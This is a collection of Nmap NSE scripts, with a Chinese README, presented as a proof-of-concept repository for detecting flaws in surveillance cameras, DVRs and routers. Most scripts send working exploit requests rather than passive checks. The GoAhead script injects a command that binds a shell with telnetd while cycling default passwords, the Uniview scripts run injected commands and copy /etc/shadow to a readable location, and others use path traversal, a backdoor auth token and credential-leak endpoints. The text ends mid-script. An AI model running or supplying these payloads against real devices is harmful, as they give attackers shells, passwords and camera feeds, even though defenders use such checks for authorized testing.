├── 28281 └── gb28181_nodetect.nse ├── Cam └── cam_directorytraveral_03.nse ├── DaHua ├── dahua_backdoor.nse └── dahua_unauth_02.nse ├── Goahead ├── goahead_rce_01.nse └── goahead_unauth_01.nse ├── Hkvision ├── cnvd-2021-14544.nse ├── hikvision_7088_post.nse ├── hikvision_backdoor_05.nse ├── hikvision_information_leakage.nse └── hikvision_lfi_06.nse ├── LG ├── lg_infoleak_v1.nse └── lg_lfi.nse ├── Novo └── credentials_disclosure.nse ├── Nuuo └── nuuo_backdoor_06.nse ├── README.md ├── RG └── RG_UAC_information_leakage.nse ├── Uniview ├── uniview_dvr_rce_03.nse ├── uniview_infoleak_01.nse └── uniview_rce_02.nse ├── XiongMai └── xiong-mai-60001.nse ├── onvif ├── onvif_anonymouse_access_detect.nse └── onvif_post_timecomparion.nse ├── script.db └── velotismart └── velotismart_directory_traversal.nse /28281/gb28181_nodetect.nse: -------------------------------------------------------------------------------- 1 | local shortport = require "shortport"; 2 | local stdnse = require "stdnse" 3 | local string = require "string" 4 | local table = require "table" 5 | local vulns = require "vulns" 6 | local nmap = require "nmap" 7 | 8 | 9 | description = [[ 10 | 检测目标视频设备是否配置了GB28181 11 | ]] 12 | 13 | author = "seaung" 14 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 15 | 16 | categories = {"GB28181", "GB28181_nodetect", "vuln_detect"} 17 | 18 | portrule = shortport.port_or_service( {554, 5060, 5061}, {"rtsp","sip"}, {"tcp", "udp"} ) 19 | 20 | action = function(host, port) 21 | local tmp1 22 | local tmp2 23 | local tmp3 24 | 25 | local output = stdnse.output_table() 26 | 27 | local p_554 = nmap.get_port_state(host, {number=554, protocol="tcp"}) 28 | local p_5060 = nmap.get_port_state(host, {number=5060, protocol="udp"}) 29 | local p_5061 = nmap.get_port_state(host, {number=5061, protocol="udp"}) 30 | 31 | 32 | if p_554 and (p_554.state == "open" or p_554.state == "open|filtered") then 33 | tmp1 = 1 34 | end 35 | 36 | if p_5060 and (p_5060.state == "open" or p_5060.state == "open|filtered") then 37 | tmp2 = 1 38 | end 39 | 40 | if p_5061 and (p_5061.state == "open" or p_5061.state == "open|filtered") then 41 | tmp3 = 1 42 | end 43 | 44 | if tmp1 ==1 and not tmp2 and not tmp3 then 45 | output = "Found vulnerable.".."Target video device is not configured GB28181" 46 | else 47 | output = "Not vulnerable" 48 | end 49 | return output 50 | end 51 | -------------------------------------------------------------------------------- /Cam/cam_directorytraveral_03.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | author = "seaung" 7 | 8 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 9 | categories = { "CAM", "cam_directorytraveral_03", "vuln_detect" } 10 | 11 | description = [[ 12 | CVE:CVE-2014-1900 13 | Desc:Y-cam存在目录遍历漏洞,未授权攻击者可以通过目录遍历来绕过认证, 14 | 并获得管理员的凭证,访问/./en/account/accedit.asp?item=0即可查看管理 15 | 员凭证 16 | Affected:YCB001, YCW001,YCB002, YCK002, YCW003 17 | ]] 18 | 19 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 20 | 21 | action = function(host, port) 22 | local output = stdnse.output_table() 23 | local path = "/./en/account/accedit.asp?item=0" 24 | local check_admin_txt = "admin" 25 | local check_admin_pwd = "1234" 26 | 27 | local r = http.get(host, port, path) 28 | 29 | if r.status == 200 then 30 | if string.find(r.body, check_admin_txt) ~= nil and string.find(r.body, check_admin_pwd) ~= nil then 31 | output = "Found Vulnerable" 32 | else 33 | output = "Not Vulnerable" 34 | end 35 | else 36 | output = "Not Vulnerable" 37 | end 38 | return output 39 | end 40 | 41 | -------------------------------------------------------------------------------- /DaHua/dahua_backdoor.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local shortport = require "shortport" 4 | local string = require "string" 5 | 6 | 7 | description = [[ 8 | 大华视频设备后门文件漏洞,影响的设备型号如下: 9 | DH-IPC-HDW23A0RN-ZS 10 | DH-IPC-HDBW23A0RN-ZS 11 | DH-IPC-HDBW13A0SN 12 | DH-IPC-HDW13A0SN 13 | DH-IPC-HFW13A0SN-W 14 | DH-IPC-HDBW13A0SN 15 | DH-IPC-HDW13A0SN 16 | DH-IPC-HFW13A0SN-W 17 | DHI-HCVR51A04HE-S3 18 | DHI-HCVR51A08HE-S3 19 | DHI-HCVR58A32S-S2 20 | ]] 21 | 22 | author = "seaung" 23 | 24 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 25 | 26 | categories = { "dahua", "dahua_backdoor", "vuln_detect" } 27 | 28 | portrule = shortport.port_or_service( {80, 443, 8080, 8090, 8088}, {"http", "https"}, "tcp", "open") 29 | 30 | 31 | action = function(host, port) 32 | local path = "/current_config/passwd" 33 | 34 | local output = stdnse.output_table() 35 | 36 | local options = {header={}} 37 | 38 | options["header"]["Connection"] = "close" 39 | options["header"]["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" 40 | options["header"]["Accept"] = "*/*" 41 | options["header"]["X-Requested-With"] = "XMLHttpRequest" 42 | options["header"]["X-Request"] = "JSON" 43 | options["header"]["User-Agent"] = "DAHUA-dhdev/1.0" 44 | 45 | local resp = http.get(host, port, path, options) 46 | 47 | if resp.status == 200 then 48 | if string.find(resp.body, "Password") ~= nil and string.find(resp.body, "Sharable") ~= nil then 49 | output = "Found vulnerable." 50 | else 51 | output = "Not vulnerable." 52 | end 53 | else 54 | output = "Not vulnerable." 55 | end 56 | 57 | return output 58 | 59 | end 60 | 61 | -------------------------------------------------------------------------------- /DaHua/dahua_unauth_02.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local string = require "string" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 大华摄像头 IPC-HF2100 2.420.0000.0.R onvif 协议身份认证漏洞, 9 | 攻击者通过onvif协议的snapshot接口绕过身份认证,直接获得摄像头实时视频图像。 10 | ]] 11 | 12 | author = "seaung" 13 | 14 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 15 | categories = { "dahua", "dahua_unauth_02", "vuln_detect" } 16 | 17 | portrule = shortport.port_or_service( {80, 443, 8080, 8090, 8088}, {"http", "https"}, "tcp", "open") 18 | 19 | action = function(host, port) 20 | local path = "/*/onvifsnapshot/*/" 21 | local output = stdnse.output_table() 22 | local options = {header={}} 23 | options["header"]["Connection"] = "close" 24 | options["header"]["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" 25 | options["header"]["Accept"] = "*/*" 26 | options["header"]["X-Requestd-With"] = "XMLHttpRequest" 27 | options["header"]["X-Request"] = "JSON" 28 | options["header"]["User-Agent"] = "DAHUA-dhdev/1.0" 29 | 30 | 31 | resp = http.get(host, port, path, options, {no_cache = true}) 32 | body = resp.body 33 | 34 | if resp.status == 200 and string.match(body, "") and not string.match(body, "404") then 35 | output = "Found vulnerable." 36 | else 37 | output = "Not vulnerable." 38 | end 39 | return output 40 | end 41 | 42 | -------------------------------------------------------------------------------- /Goahead/goahead_rce_01.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local nmap = require "nmap" 5 | 6 | 7 | description = [[ 8 | GoAhead系列 9 | 经过身份认证后可执行系统命令 10 | ]] 11 | 12 | 13 | author = "seaung" 14 | 15 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 16 | 17 | categories = { "goahead", "goahead_rce_01", "vuln_detect" } 18 | 19 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 20 | 21 | action = function(host, port) 22 | stdnse.verbose("[*] Starting check vulnreable.") 23 | 24 | local users = {"admin", "root"} 25 | local pawds = {"12345", "123456", "admin", "qwe123"} 26 | 27 | local output = stdnse.output_table() 28 | 29 | 30 | for key, value in ipairs(users) do 31 | for k, v in ipairs(pawds) do 32 | local path = string.format([[/set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0]], value, v) 33 | local response = http.get(host, port, path) 34 | 35 | if response.status == 200 then 36 | socket = nmap.new_socket() 37 | socket:set_timeout(10) 38 | local state, err = socket:connect(host.ip, 25) 39 | if not state then 40 | output = "Not vulnerable." 41 | socket:close() 42 | else 43 | output = "Found vulnerable." 44 | socket:close() 45 | end 46 | else 47 | output = "Not vulnerable." 48 | end 49 | end 50 | end 51 | 52 | return output 53 | 54 | end 55 | 56 | 57 | -------------------------------------------------------------------------------- /Goahead/goahead_unauth_01.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local string = require "string" 5 | 6 | description = [[ 7 | GoAhead系列 8 | 只要访问地址(url)中含有loginuse和loginpas这两个值即攻击者可绕过认证导致信息(登录凭据)泄漏漏洞 9 | ]] 10 | 11 | author = "seaung" 12 | 13 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 14 | 15 | categories = { "goahead", "goahead_unauth_01", "vuln_detect" } 16 | 17 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 18 | 19 | action = function(host, port) 20 | -- stdnse.verbose("[*] Starting check vulnreable.") 21 | 22 | local path = "/system.ini?loginuse&loginpas" 23 | 24 | local output = stdnse.output_table() 25 | 26 | local response = http.get(host, port, path) 27 | 28 | if response.status == 200 and string.find(response.body, "IPCAM") ~= nil then 29 | output = "Found vulnerable." 30 | else 31 | output = "Not vulnerable." 32 | end 33 | return output 34 | end 35 | 36 | -------------------------------------------------------------------------------- /Hkvision/cnvd-2021-14544.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | description = [[ 7 | 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞, 8 | 攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息 9 | ]] 10 | 11 | author = "seaung" 12 | 13 | 14 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 15 | categories = { "hikvision", "cnvd-2021-14544", "vuln_detect" } 16 | 17 | 18 | portrule = shortport.port_or_service({ 80, 443, 4444, 8000, 8080, 8443, 9000, 9001, 9090 }, { "http", "https" }, "tcp", "open") 19 | 20 | 21 | action = function(host, port) 22 | local output = stdnse.output_table() 23 | local path = "/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini" 24 | local check_txt = "drivers" 25 | 26 | local response = http.get(host, port, path) 27 | 28 | --print(response.body) 29 | 30 | if response.status == 200 and string.find(response.body, check_txt) ~= nil then 31 | output = "[+] Found vulnerable" 32 | else 33 | output = "[-] Not Found vulnerable" 34 | end 35 | 36 | return output 37 | end 38 | -------------------------------------------------------------------------------- /Hkvision/hikvision_7088_post.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local string = require "string" 5 | 6 | 7 | description = [[ 8 | 海康视频设备接入网关账号信息泄露. 9 | ]] 10 | 11 | author = "seaung" 12 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 13 | categories = { "hikvision", "hikvision_7088_post", "vuln_detect" } 14 | 15 | portrule = shortport.port_or_service( {7788,7288}, {"http", "https"}, "tcp", "open") 16 | 17 | action = function(host, port) 18 | 19 | local output_tab = stdnse.output_table() 20 | local path = "/data/userInfoDate.php" 21 | local exploit = [[page=1&rows=20&sort=userId&order=asc]] 22 | local options = {header={["Content-Type"]='application/x-www-form-urlencoded'}} 23 | local response = http.post(host, port, path, options, nil, exploit) 24 | 25 | local rawheader = response.rawheader 26 | local body = response.body 27 | local match_name = "name" 28 | local match_pass = "password" 29 | 30 | if response.status == 200 and string.match(body, match_name) and string.match(body, match_pass) then 31 | output_tab.yd_cmd1 = "/data/userInfoDate.php".." ".."Found vulnerable." 32 | output_tab.yd_rbody1 = body 33 | end 34 | 35 | return output_tab 36 | 37 | end 38 | 39 | -------------------------------------------------------------------------------- /Hkvision/hikvision_backdoor_05.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - 访问控制绕过 9 | 后门文件,可用于重置密码 10 | ]] 11 | 12 | 13 | author = "seaung" 14 | 15 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 16 | categories = { "hikvision", "hikvision_backdoor_05", "vuln_detect" } 17 | 18 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 19 | 20 | action = function(host, port) 21 | local back_door_auth_args = "auth=YWRtaW46MTEK" 22 | local base_url = "/Security/users?" 23 | local uri = base_url..back_door_auth_args 24 | local output = stdnse.output_table() 25 | 26 | local response = http.get(host, port, uri) 27 | 28 | if response.status == 200 then 29 | content = response.body 30 | if string.find(content, "id") and string.find(content, "userName") ~= nil then 31 | output = "Found vulnerable." 32 | else 33 | output = "Not vulnerable." 34 | end 35 | else 36 | output = "Not vulnerable." 37 | end 38 | 39 | return output 40 | 41 | end 42 | 43 | -------------------------------------------------------------------------------- /Hkvision/hikvision_information_leakage.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local string = require "string" 4 | local shortport = require "shortport" 5 | 6 | 7 | author = "seaung" 8 | 9 | description = [[ 10 | Hikvision DV 泄露web版本信息 11 | ]] 12 | 13 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 14 | 15 | categories = { "hikvision", "hikvision_information_leakage", "vuln_detect" } 16 | 17 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 18 | 19 | action = function(host, port) 20 | local output = stdnse.output_table() 21 | local path = "/doc/script/lib/seajs/config/sea-config.js?version=" 22 | 23 | local response = http.get(host, port, path) 24 | 25 | if response.status == 200 then 26 | if string.find(response.body, "seajs.web_version") ~= nil and string.find(response.body, "seajs.plugin_version") ~= nil then 27 | output.yd_web_version = string.match(response.body, "(%u%w.%w.%d%a+%d+)") 28 | output.yd_plugin_version = string.match(response.body, "(%u%w.%d+.%d+.%d+)") 29 | output.yd_info = "Found vulnerable" 30 | else 31 | output.yd_info = "Not vulnerable" 32 | end 33 | else 34 | output.yd_info = "Bad Request" 35 | end 36 | return output 37 | end 38 | 39 | -------------------------------------------------------------------------------- /Hkvision/hikvision_lfi_06.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 海康威视某系列控制台文件包含导致getshell 9 | 在controller参数的一个任意文件包含:包含日志文件getshell 10 | ]] 11 | 12 | 13 | author = "seaung" 14 | 15 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 16 | categories = { "hikvision", "hikvision_lfi_06", "vuln_detect" } 17 | 18 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 19 | 20 | action = function(host, port) 21 | stdnse.verbose("[*] start check vulnerable.") 22 | local payload = "/index.php?controller=../../../../Server/logs/error.log%00.php" 23 | local output = stdnse.output_table() 24 | 25 | local response = http.get(host, port, payload) 26 | 27 | if response.status == 200 then 28 | content = response.body 29 | if string.find(content, "Venus01") ~= nil then 30 | output = "Found vulnerable." 31 | else 32 | output = "Not vulnerable." 33 | end 34 | else 35 | output = "Not vulnerable." 36 | end 37 | return output 38 | end 39 | 40 | -------------------------------------------------------------------------------- /LG/lg_infoleak_v1.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | . LG DVR LE6016D 9 | 未认证远程获取用户/密码 10 | ]] 11 | 12 | author = "seaung" 13 | 14 | license = "Same as Nmap--See https://namp.org/book/man-legal.html" 15 | categories = { "LG", "lg_infoleak_v1", "vuln_detect" } 16 | 17 | portrule = shortport.http 18 | 19 | 20 | action = function(host, port) 21 | local uri = "/dvr/wwwroot/user.cgi" 22 | local output = stdnse.output_table() 23 | local response = http.get(host, port, uri) 24 | 25 | if response.status == 200 and string.find(response.body, "<name>") ~= nil and string.find(response.body, "<pw>") ~= nil then 26 | output = "[+] Found vulnerable." 27 | else 28 | output = "[-] Not Found vulnerable." 29 | end 30 | return output 31 | end 32 | 33 | -------------------------------------------------------------------------------- /LG/lg_lfi.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | Desc:LG DVR LE6016D存在敏感信息泄露漏洞, 9 | 未认证用户只需要发起一个请求链接即可访问系统敏感文件, 10 | 如/etc/passwd, /etc/shadow 11 | Tested:LG DVR LE6016D 12 | ]] 13 | 14 | 15 | author = "seaung" 16 | 17 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 18 | categories = { "LG", "lg_lfi", "vuln_detect" } 19 | 20 | 21 | portrule = shortport.http 22 | 23 | action = function(host, port) 24 | local output = stdnse.output_table() 25 | local path = "/etc/passwd" 26 | local response = http.get(host, port, path) 27 | 28 | if response.status == 200 and string.find(response.body, "root") ~= nil then 29 | output = "[+] Found vulnerable." 30 | else 31 | output = "[-] Not Found vulnerable." 32 | end 33 | return output 34 | end 35 | 36 | -------------------------------------------------------------------------------- /Novo/credentials_disclosure.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | description = [[ 7 | Desc:Novo DVR存在凭证泄露问题, 8 | 攻击者精心构造链接, 9 | 修改cookie信息即可查看返回的登录凭证信息。 10 | ]] 11 | 12 | author = "seaung" 13 | 14 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 15 | categories = { "Novo", "credentials_disclosure", "vuln_detect" } 16 | 17 | portrule = shortport.http 18 | 19 | action = function(host, port) 20 | local path = "/device.rsp?opt=user&cmd=list" 21 | local output = stdnse.output_table() 22 | local options = {headers={}} 23 | options["headers"]["cookie"] = "uid=admin" 24 | 25 | local response = http.get(host, port, path, options) 26 | 27 | if response.status == 200 and string.find(response.body, "admin") ~= nil and string.find(response.body, "pwd") ~= nil then 28 | --stdnse.debug1("[+] found vulnerable.") 29 | output = "[+] Found vulnerable." 30 | else 31 | --stdnse.debug1("[-] not found vulnerable.") 32 | output = "[-] Not Found vulnerable." 33 | end 34 | return output 35 | end 36 | -------------------------------------------------------------------------------- /Nuuo/nuuo_backdoor_06.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | author = "seaung" 7 | 8 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 9 | categories = { "Nuuo", "nuuo_backdoor_06", "vuln_detect" } 10 | 11 | 12 | description = [[ 13 | version: <=3.0.8 14 | 设备有一个隐藏的PHP脚本,在调用时,会创建一个具有poweruser权限的后门用 15 | 户,该权限可以在受影响的设备上读写文件。 使用密码“111111”通过访问“strong_user.php” 16 | 脚本创建后门用户“bbb”能够启动安全shell会话并进一步窃取和或破坏敏感信息。 17 | ]] 18 | 19 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 20 | 21 | action = function(host, port) 22 | local output = stdnse.output_table() 23 | local path = "/strong_user.php" 24 | local check_txt = "Read Passwd" 25 | local check_txt_root = "Username: root" 26 | local r = http.get(host, port, path) 27 | 28 | if r.status == 200 and string.find(r.body, check_txt) ~= nil and string.find(r.body, check_txt_root) ~= nil then 29 | output = "Found Vulnerable" 30 | else 31 | output = "Not Vulnerable" 32 | end 33 | return output 34 | end 35 | 36 | 37 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | #### 关于 2 | 这里是专门收集各大监控摄像头和路由器漏洞的POC仓库 3 | 4 | 5 | #### 怎么使用 6 | 7 | 在使用这些脚本之前,请将script.db文件覆盖掉nmap默认的script.db文件 8 | 将所有的脚本放置到namp的脚本目录下 9 | 10 | ``` 11 | # 运行全部的脚本 12 | nmap --script vuln-detect 0.0.0.0/24 13 | 14 | 15 | # 运行海康摄像头漏洞检测脚本 16 | nmap --script hkvision 0.0.0.0/24 17 | 18 | 19 | # 运行锐捷摄像头漏洞检测脚本 20 | nmap --script ruijie 0.0.0.0/24 21 | 22 | 23 | # 运行LG摄像头漏洞检测脚本 24 | nmap --script LG 0.0.0.24 25 | ``` 26 | 27 | --- 28 | that's all 29 | -------------------------------------------------------------------------------- /RG/RG_UAC_information_leakage.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露, 9 | 可以间接获取用户账号密码信息登录后台 10 | ]] 11 | 12 | author = "seaung" 13 | 14 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 15 | categories = { "ruijie", "RG_UAC_information_leakage", "vuln_detect" } 16 | 17 | portrule = shortport.port_or_service({80, 443, 8000, 8080, 8443}, { "http", "https" }, "tcp", "open") 18 | 19 | action = function(host, port) 20 | local output = stdnse.output_table() 21 | local admin_txt = "super_admin" 22 | local pass_txt = "password" 23 | local options = {headers={}} 24 | options["headers"]["user-agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36" 25 | local response = http.get(host, port, "/", options) 26 | 27 | if string.find(response.body, admin_txt) ~= nil and string.find(response.body, pass_txt) ~= nil and response.status == 200 then 28 | output = "[+] Found vulnerable" 29 | else 30 | output = "Not Found vulnerable" 31 | end 32 | return output 33 | end 34 | -------------------------------------------------------------------------------- /Uniview/uniview_dvr_rce_03.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local string = require "string" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 宇视视频(DVR/NVR)远程命令执行漏洞 9 | 影响设备型号:ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308 _HF_E ECR3308-HF-E 10 | ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL 11 | ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L 12 | ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E 13 | ]] 14 | 15 | author = "seaung" 16 | 17 | 18 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 19 | categories = { "uniview", "uniview_dvr_nvr_rce_03", "vuln_detect" } 20 | 21 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 22 | 23 | action = function(host, port) 24 | local output = stdnse.output_table() 25 | local url1 = [[/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/yzkx.php]] 26 | local url2 = "/Interface/DevManage/yzkx.php" 27 | local options = {header={}} 28 | options["header"]["Accept"] = "*/*" 29 | options["header"]["Accept-Language"] = "en-US,en;q=0.8" 30 | options["header"]["Cache-Control"] = "max-age=0" 31 | options["header"]["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 32 | options["header"]["Connection"] = "keep-alive" 33 | 34 | local res1 = http.get(host, port, url1, options) 35 | local res2 = http.get(host, port, url2, options) 36 | 37 | body = res2.body 38 | 39 | if res2.status == 200 and string.match(body, "<title>") and not string.match(body, "404") then 40 | output = "Found vulnerable." 41 | else 42 | output = "Not vulnerable." 43 | end 44 | return output 45 | end 46 | 47 | -------------------------------------------------------------------------------- /Uniview/uniview_infoleak_01.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local stdnse = require "stdnse" 3 | local string = require "string" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 宇视视频设备配置信息泄露漏洞,影响的设备型号如下: 9 | NVR304-16E NVR301-08-P8 10 | 攻击者无需身份验证即可访问配置信息 11 | ]] 12 | 13 | 14 | author = "seaung" 15 | 16 | 17 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 18 | categories = { "uniview", "uniview_infoleak_01", "vuln_detect" } 19 | 20 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 21 | 22 | action = function(host, port) 23 | local output = stdnse.output_table() 24 | 25 | local path = [[/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":8888888888}]] 26 | 27 | local res = http.get(host, port, path) 28 | 29 | if res.status == 200 then 30 | if string.find(res.body, "UserCfg") ~= nil and string.find(res.body, "Num") then 31 | output = "Found vulnerable." 32 | else 33 | output = "Not vulnerable." 34 | end 35 | else 36 | output = "Not vulnerable." 37 | end 38 | return output 39 | end 40 | 41 | -------------------------------------------------------------------------------- /Uniview/uniview_rce_02.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | 7 | description = [[ 8 | 宇视视频设备认证绕过远程命令执行漏洞,影响的设备型号如下: 9 | NVR304-16E NVR301-08-P8 10 | 攻击无需通过身份验证既可以远程执行命令 11 | ]] 12 | 13 | author = "seaung" 14 | 15 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 16 | categories = { "uniview", "uniview_rce_02", "vuln_detect" } 17 | 18 | portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open") 19 | 20 | action = function(host, port) 21 | local output = stdnse.output_table() 22 | local cmd 23 | 24 | local path = [[/cgi-bin/main-cgi?json={"cmd":264,"status":1,"bSelectAllPort":1,"stSelPort":0,"bSelectAllIp":1,"stSelIp":0,"stSelNicName":";cp /etc/shadow /tmp/packetcapture.pcap;]] 25 | 26 | local response = http.get(host, port, path) 27 | 28 | if response.status == 200 then 29 | local url = [[/cgi-bin/main-cgi?json={"cmd":265,"szUserName":"","u32UserLoginHandle":-1}]] 30 | local resp = http.get(host, port, url) 31 | if string.find(resp.body, [["success": true]]) ~= nil or string.find(resp.body, [[root:]]) ~= nil then 32 | output = "Found vulnerable." 33 | else 34 | output = "Not vulnerable." 35 | end 36 | else 37 | output = "Not vulnerable." 38 | end 39 | return output 40 | end 41 | 42 | -------------------------------------------------------------------------------- /XiongMai/xiong-mai-60001.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local string = require "string" 3 | local stdnse = require "stdnse" 4 | local shortport = require "shortport" 5 | 6 | author = "seaung" 7 | 8 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 9 | categories = { "xiongmai", "xiongmai_60001", "vuln_detect" } 10 | 11 | description = [[ 12 | 雄迈视频设备存在后台管理页面,端口60001,易受到口令爆破攻击。 13 | ]] 14 | 15 | portrule = shortport.port_or_service( {60001}, {"http", "https"}, "tcp", "open") 16 | 17 | action = function(host, port) 18 | local output = stdnse.output_table() 19 | local path = "/" 20 | local path2 = "/view2.html" 21 | local check_str = "onDblClick" 22 | local check_text = "Network video client" 23 | local check_view2 = "view2.js" 24 | local r = http.get(host, port, path) 25 | local r1 = http.get(host, port, path2) 26 | 27 | if r.status == 200 and r1.status == 200 then 28 | if string.find(r.body, check_str) ~= nil and string.find(r.body, check_text) ~= nil and string.find(r1.body, check_view2) ~= nil then 29 | output = "Found Vulnerable" 30 | else 31 | output = "Not Vulnerable" 32 | end 33 | else 34 | output = "Not Vulnerable" 35 | end 36 | return output 37 | 38 | end 39 | -------------------------------------------------------------------------------- /onvif/onvif_anonymouse_access_detect.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local shortport = require "shortport" 3 | local stdnse = require "stdnse" 4 | local string = require "string" 5 | local table = require "table" 6 | local vulns = require "vulns" 7 | 8 | description = [[ 9 | 检测视频设备是否存在onvif类接口的匿名访问漏洞.. 10 | ]] 11 | 12 | author = "seaung" 13 | license = "Same as Nmap--See https://nmap.org/book/man-legal.html" 14 | categories = {"vuln_detect", "onvif_anonymouse_access_detect"} 15 | 16 | portrule = shortport.port_or_service({80, 443}, {"http", "https"}, "tcp", "open") 17 | 18 | action = function(host, port) 19 | 20 | local output_tab = stdnse.output_table() 21 | 22 | local path = "/onvif/device_service" 23 | local exploit = [[<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl"/></s:Body></s:Envelope>]] 24 | local options = {header={["Content-Type"]='application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetScopes"'}} 25 | local response = http.post(host, port, path, options, nil, exploit) 26 | local body = 